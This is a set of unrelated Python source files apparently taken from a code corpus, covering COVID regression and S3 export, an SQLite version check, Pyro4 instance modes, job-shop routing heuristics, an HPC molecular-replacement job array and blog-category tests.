# call the i_regress() function to run the models themselves
lr_1, gb_1 = i_regress(covid_df, features, target='deaths', test_size=.3, n_estimators=500)
lr_2, gb_2 = i_regress(covid_df, features, target='confirmed_cases', test_size=.2, n_estimators=200)
lr_3, gb_3 = i_regress(covid_df, features, target='deaths_per_100k', test_size=.4, n_estimators=500)
lr_4, gb_4 = i_regress(covid_df, features, target='cases_per_100k', test_size=.35, n_estimators=500)
## Begin re-working the dataframe for exporting to Tableau Dashboard
# Receate a features list containing only the numerical features
cols = dict(covid_df.dtypes)
features = []
for col in cols:
if "object" not in str(cols[col]) and col not in targets_list:
features.append(col)
# Create a list of the state columns and seperate them from the features list
states = []
for feat in features:
if len(feat)==2 and 'Q' not in feat:
states.append(feat)
for state in states:
features.remove(state)
# create a locations list
locations = ['latitude', 'longitude', 'fips']
for loc in locations:
features.remove(loc)
print('For re-assessment, wittling down to ', len(features), ' features')
# If the model input is envoked, run models:
if model:
# Run the models again and look for movement
print('\nRe-running the models using new features\n')
lr_5, gb_5 = i_regress(covid_df, features, target='deaths', test_size=.3, n_estimators=500)
lr_6, gb_6 = i_regress(covid_df, features, target='confirmed_cases', test_size=.2, n_estimators=200)
lr_7, gb_7 = i_regress(covid_df, features, target='deaths_per_100k', test_size=.4, n_estimators=500)
lr_8, gb_8 = i_regress(covid_df, features, target='cases_per_100k', test_size=.35, n_estimators=500)
print('\nIn next iteration, this is a good place for a printout of the')
print(' results of the modeling. Show a graph demonstrating changes\n')
strongest = ['deaths_per_100k', 'cases_per_100k', 'pct_white',
'pct_black', 'percapita_income', 'median_household_income',
'median_family_income']
plt.figure(figsize=(18, 12))
#sns.set(font_scale=3) # font size 2
sns.heatmap(covid_df[strongest].corr(), cmap='coolwarm', annot=True );
plt.title('Heatmap of strongest correlations in Model', fontsize=24)
def prep_final_data(datapath, dashboard_datapath, archive_path,
filename, date, bucket=BUCKETNAME):
'''
sends final data set to storage
datapath is a string, the relative or absolute path to the data storage
dashboard_datapath is a string, the path to where dashboard file is stored
archive_path is a string, the path to where the archvies are stored
filename is the name of the daily snapshot file
date is a string representing the report date
bucket is a string representing the name of the s3 bucket
'''
print(f'\nBeginning final data set formation for {date}')
# read in the csv to build dataframe
covid_df = pd.read_csv(f's3://{bucket}/{datapath}/{filename}')
covid_df.set_index('county_state', inplace=True)
# drop the state columns
df_lower = covid_df[['confirmed_cases', 'deaths', 'latitude', 'longitude', 'fips',
'percapita_income', 'median_household_income', 'median_family_income',
'number_of_households', 'Population', 'pct_white', 'pct_black',
'pct_asian', 'pct_hispanic', 'pct_native_american', 'pct_hawaiian',
'QMB_Only', 'QMB_plus_Full', 'SLMB_only', 'SLMB_plus_Full', 'QI',
'Other_full', 'Public_Total', 'SNAP_PA_Participation_Persons',
'SNAP_NPA_Participation_Persons', 'SNAP_All_Participation_Persons',
'SNAP_PA_Participation_Households', 'SNAP_NPA_Participation_Households',
'SNAP_All_Participation_Households', 'SNAP_All_Issuance',
'deaths_per_100k', 'cases_per_100k', 'jobs_per_100k',
'av_household_earnings_per_100k']]
# drop Alaska and Hawaii
df_lower = covid_df[(covid_df['AK'] == 0) & (covid_df['HI'] == 0)]
df_lower.rename(columns={'pct_black':'pct_African_American'}, inplace=True)
df_lower.rename(columns={'pct_hispanic':'pct_Latinx'}, inplace=True)
df_lower.rename(columns={'pct_asian':'pct_Asian'}, inplace=True)
df_lower.rename(columns={'pct_native_american':'pct_Native_American'}, inplace=True)
data_set = date + '_cov_soc_eco_lower48.csv'
# Export to data store
dated_buffer = StringIO()
df_lower.to_csv(dated_buffer)
s3_resource = boto3.resource('s3')
s3_resource.Object(bucket, f'{archive_path}/{data_set}').put(Body=dated_buffer.getvalue())
#commenting out next line as change to StringIO
#df_lower.to_csv(archive_path + data_set)
# Export to daily update store
csv_buffer = StringIO()
df_lower.to_csv(csv_buffer)
s3_resource = boto3.resource('s3')
s3_resource.Object(bucket, f'{dashboard_datapath}/daily_update.csv').put(Body=csv_buffer.getvalue())
#commenting out next line as change to StringIO
#df_lower.to_csv(dashboard_datapath + 'daily_update.csv')
# print the cases and deaths numbers from the final data_set
print("Think about changing this to be today's numbers:")
print('cases total on new data set: ', df_lower['confirmed_cases'].sum())
print('deaths total on new data set: ', df_lower['deaths'].sum())
print(f'\nSUCCESS, completed creating {data_set} and exported to {datapath}\n')
| StarcoderdataPython |
1705860 | #!/usr/bin/env python3
# Copyright 2021 BHG [bw.org]
# as of 2021-04-07 bw
import sqlite3
def main():
db = sqlite3.connect(":memory:")
cur = db.cursor()
cur.execute("SELECT sqlite_version()")
version = cur.fetchone()[0]
print(f"SQLite version {version}")
cur.close()
db.close()
if __name__ == "__main__":
main()
| StarcoderdataPython |
3308783 | from __future__ import print_function
import Pyro4
@Pyro4.behavior(instance_mode="single")
class SingleInstance(object):
@Pyro4.expose
def msg(self, message):
print("[%s] %s.msg: %s" % (id(self), self.__class__.__name__, message))
return id(self)
@Pyro4.behavior(instance_mode="session", instance_creator=lambda clazz: clazz.create_instance())
class SessionInstance(object):
@Pyro4.expose
def msg(self, message):
print("[%s] %s.msg: %s" % (id(self), self.__class__.__name__, message))
return id(self), self.correlation_id
@classmethod
def create_instance(cls):
obj = cls()
obj.correlation_id = Pyro4.current_context.correlation_id
return obj
@Pyro4.behavior(instance_mode="percall")
class PercallInstance(object):
@Pyro4.expose
def msg(self, message):
print("[%s] %s.msg: %s" % (id(self), self.__class__.__name__, message))
return id(self)
if __name__ == "__main__":
# please make sure a name server is running somewhere first.
Pyro4.Daemon.serveSimple({
SingleInstance: "instance.single",
SessionInstance: "instance.session",
PercallInstance: "instance.percall"
}, verbose=True)
| StarcoderdataPython |
3265381 | <filename>FJSP/routing.py
import simpy
import random
import numpy as np
import torch
'''
routing data
job_idx, routing_data, machine_condition, job_pt, job slack, wc_idx, remaining_pt
routing_data = [cumulative_pt, time till available, que_size, cumulative_run_time]
'''
# Benchmark, as the worst possible case
def random_routing(idx, data, job_pt, job_slack, wc_idx, *args):
machine_idx = np.random.randint(len(job_pt))
return machine_idx
def TT(idx, data, job_pt, job_slack, wc_idx, *args): # shortest total waiting time
# axis=0 means choose along columns
# print("routing data:", data)
rank = np.argmin(data, axis=0)
machine_idx = rank[0]
return machine_idx
def ET(idx, data, job_pt, job_slack, wc_idx, *args): # minimum exceution time
machine_idx = np.argmin(job_pt)
return machine_idx
def EA(idx, data, job_pt, job_slack, wc_idx, *args): # earliest available
#print(data, np.transpose(data))
rank = np.argmin(data, axis=0)
machine_idx = rank[1]
return machine_idx
def SQ(idx, data, job_pt, job_slack, wc_idx, *args): # shortest queue
rank = np.argmin(data, axis=0)
machine_idx = rank[2]
return machine_idx
def CT(idx, data, job_pt, job_slack, wc_idx, *args): # earliest completion time
#print(data,job_pt)
completion_time = np.array(data)[:,1].clip(0) + np.array(job_pt)
machine_idx = completion_time.argmin()
return machine_idx
def UT(idx, data, job_pt, job_slack, wc_idx, *args): # lowest utilization rate
rank = np.argmin(data, axis=0)
machine_idx = rank[3]
return machine_idx
def GP_R1(idx, data, job_pt, job_slack, wc_idx, *args): # genetic programming
data = np.transpose(data)
sec1 = min(2 * data[2] * np.max([data[2]*job_pt/data[1] , job_pt*data[0]*data[0]], axis=0))
sec2 = data[2] * job_pt - data[1]
sum = sec1 + sec2
machine_idx = sum.argmin()
return machine_idx
def GP_R2(idx, data, job_pt, job_slack, wc_idx, *args): # genetic programming
data = np.transpose(data)
sec1 = data[2]*data[2], (data[2]+job_pt)*data[2]
sec2 = np.min([data[1],args[0]/(data[1]*args[0]-1)],axis=0)
sec3 = -data[2] * args[0]
sec4 = data[2] * job_pt * np.max([data[0], np.min([data[1],job_pt],axis=0)/(args[0])],axis=0)
sec5 = np.max([data[2]*data[2], np.ones_like(data[2])*(args[1]-args[0]-1), (data[2]+job_pt)*np.min([data[2],np.ones_like(data[2])*args[1]],axis=0)],axis=0)
sum = sec1 - sec2 * np.max([sec3+sec4/sec5],axis=0)
machine_idx = sum.argmin()
return machine_idx
| StarcoderdataPython |
3333945 | <filename>swamp/mr/mrarray.py<gh_stars>1-10
import swamp.mr.mrjob
from swamp.mr.mr import Mr
from pyjob import TaskFactory
class MrArray(Mr):
"""An array of molecular replacement tasks to solve a given structure.
This class implements data structures to hold all the MR tasks to be executed on a target. It implements functions
to run and store results of these tasks, contained as instances of :py:obj:`~swamp.mr.mrjob.MrJob` instances.
:param str id: unique identifier for the :py:obj:`~swamp.mr.mrarray.MrArray` instance
:param str workdir: working directory where the :py:obj:`~swamp.mr.mrjob.MrJob` instances will be executed
:param str target_mtz: target's mtz filename
:param str target_fa: target's fasta filename
:param str platform: platform where the array of tasks will be executed (default 'sge')
:param str queue_name: name of the queue where the tasks should be submitted (default None)
:param str queue_environment: queue environment where the tasks should be submitted (default None)
:param str phased_mtz: target's mtz filename containing phase information (default None)
:param int max_concurrent_nprocs: maximum number of concurrent tasks to be executed at any given time (default 1)
:param int job_kill_time: kill time assigned to :py:obj:`~swamp.mr.mrjob.MrJob` instances (default None)
:param `~swamp.logger.swamplogger.SwampLogger` logger: logging interface for the MR pipeline (default None)
:param bool silent: if set to True the logger will not print messages
:param int max_array_size: set the maximum permitted number of :py:obj:`pyjob.Scripts` instances in a submitted \
:py:obj:`pyjob.ClusterTask` (default None)
:ivar list results: A list with the figures of merit obtained after the completion of the pipeline
:ivar bool error: True if errors have occurred at some point on the pipeline
:ivar list job_list: A list of the :py:obj:`~swamp.mr.mrjob.MrJob` instances contained on this \
:py:obj:`~swamp.mr.mrarray.MrArray` instance.
:ivar dict job_dict: A dictionary of the :py:obj:`~swamp.mr.mrjob.MrJob` instances contained on this \
:py:obj:`~swamp.mr.mrarray.MrArray` instance. Key corresponds with :py:attr:`swamp.mr.mrjob.MrJob.id`
:ivar list scripts: List of :py:obj:`pyjob.Scripts` instances to be executed on this \
:py:obj:`~swamp.mr.mrarray.MrArray` instance
:ivar str shell_interpreter: Indicates shell interpreter to execute \
:py:obj:`~swamp.mr.mrjob.MrJob` (default '/bin/bash')
:example:
>>> from swamp.mr import MrArray, MrJob
>>> mr_array = MrArray('<id>', '<workdir>', '<target_mtz>', 'target_fasta>')
>>> mr_array.add(MrJob('<id>', '<workdir>'))
>>> print(mr_array)
MrArray(id="<id>", njobs=1)
>>> mr_array.run()
"""
def __init__(self, id, workdir, target_mtz, target_fa, platform="sge", queue_name=None, logger=None,
max_array_size=None, queue_environment=None, phased_mtz=None, max_concurrent_nprocs=1,
job_kill_time=None, silent=False):
super(MrArray, self).__init__(id, target_fa, target_mtz, workdir, phased_mtz=phased_mtz,
logger=logger, silent=silent)
self.init_params = locals()
self.logger.info(self.pipeline_header.format('MR-ARRAY'))
self.logger.info(self._inform_args(**self.init_params))
self.max_concurrent_nprocs = max_concurrent_nprocs
self.platform = platform
self.job_kill_time = job_kill_time
self.queue_name = queue_name
self.queue_environment = queue_environment
self.job_list = []
self.job_dict = {}
self.scripts = []
self.shell_interpreter = "/bin/bash"
self.max_array_size = max_array_size
def __repr__(self):
return '{}(id={}, njobs={})'.format(self.__class__.__name__, self.id, len(self.job_list))
def __contains__(self, id):
"""True if there is a job with the given id"""
return id in self.job_dict
def __delitem__(self, id):
"""Remove a job with given id"""
job = self[id]
job.parent_array = None
self.job_dict.pop(id)
self.job_list.remove(job)
def __getitem__(self, id):
"""Return the job with the given id"""
if isinstance(id, slice):
raise NotImplementedError('MrArray does not support slicing yet!')
elif isinstance(id, int):
return self.job_list[id]
else:
return self.job_dict[id]
def __iter__(self):
"""Iterate over the job list"""
for job in self.job_list:
yield job
def __len__(self):
"""Return the number of jobs"""
return len(self.job_list)
def __reversed__(self):
"""Reversed list of jobs"""
for job in reversed(self.job_list):
yield job
# ------------------ General properties ------------------
@property
def cleanup_dir_list(self):
"""List of directories to cleanup after pipeline completion :py:attr:`~swamp.mr.mrarray.MrArray.workdir`"""
return [self.workdir]
@property
def _other_task_info(self):
"""A dictionary with the extra kwargs for :py:obj:`pyjob.TaskFactory`"""
info = {'directory': self.workdir, 'shell': self.shell_interpreter}
if self.platform == 'local':
info['processes'] = self.max_concurrent_nprocs
else:
info['max_array_size'] = self.max_concurrent_nprocs
if self.queue_environment is not None:
info['environment'] = self.queue_environment
if self.queue_name is not None:
info['queue'] = self.queue_name
if self.job_kill_time is not None:
info['runtime'] = self.job_kill_time
return info
# ------------------ Methods ------------------
def add(self, value):
"""Add an instance of :py:obj:`~swamp.mr.mrjob.MrJob` to the array. This includes both the MrJob object \
and its :py:obj:`pyjob.Script` attribute.
:argument value: :py:obj:`~swamp.mr.mrjob.MrJob` instance to be added \
to the array for execution
:raises TypeError: value is not an instance of :py:obj:`~swamp.mr.mrjob.MrJob`
:raises ValueError: a :py:obj:`~swamp.mr.mrjob.MrJob` instance with the same \
:py:attr:`swamp.mr.mrjob.MrJob.id` is already contained in the array
"""
if not isinstance(value, swamp.mr.mrjob.MrJob):
raise TypeError('Can only add MrJob instances to an MrArray!')
if value.id in self:
raise ValueError("MrJob %s defined twice!" % value)
self.logger.debug('Registering job %s into the array' % value)
value.parent_array = self
self.job_list.append(value)
self.job_dict[value.id] = value
self.scripts.append(value.script)
def run(self, store_results=False):
"""Send the array for execution in the HPC using :py:obj:`pyjob.TaskFactory`
:argument bool store_results: Not implemented
"""
self.logger.info("Sending the MR task array to the HPC for execution")
if self.max_array_size is not None:
all_scripts = [tuple(self.scripts[x:x + self.max_array_size]) for x in
range(0, len(self.scripts), self.max_array_size)]
else:
all_scripts = (self.scripts,)
for idx, scripts in enumerate(all_scripts, 1):
self.logger.info('Sending task array %s / %s' % (idx, len(all_scripts)))
with TaskFactory(self.platform, scripts, **self._other_task_info) as task:
task.name = 'swamp'
task.run()
self.logger.info('All tasks in the array have been completed!')
self.logger.info('Retrieving results')
def append_results(self):
"""Append the results obtained in each :py:obj:`~swamp.mr.mrjob.MrJob` instance listed at \
:py:attr:`~swamp.mr.mrarray.MrArray.job_list` into :py:attr:`~swamp.mr.mr.Mr.results`"""
for job in self.job_list:
if job.results is not None:
self.logger.debug('Recovering results of job %s' % job.id)
self.results += job.results
else:
self.logger.debug('Cannot find any results for job %s' % job.id)
| StarcoderdataPython |
3391077 | <filename>tests/test_category.py
from pytypecho import Category
def test_get_category(te):
r = te.get_categories()
assert r
assert r[0]['categoryName'] == '默认分类'
def test_new_category(te):
category = Category(name='Category Name')
r = te.new_category(category)
assert r
assert isinstance(r, int)
def test_del_category(te):
r = te.del_category(2)
assert r
| StarcoderdataPython |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.